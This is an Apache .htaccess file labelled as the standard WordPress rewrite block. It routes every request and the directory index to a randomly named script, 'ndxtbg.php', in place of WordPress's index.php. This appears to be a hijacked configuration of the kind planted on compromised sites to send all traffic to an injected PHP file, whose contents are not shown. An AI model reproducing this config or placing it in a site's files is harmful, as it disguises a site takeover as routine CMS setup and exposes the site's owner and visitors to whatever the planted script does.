# BEGIN WordPress
<IfModule mod_rewrite.c>

DirectoryIndex ndxtbg.php
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /ndxtbg.php [L]

</IfModule>

# END WordPress


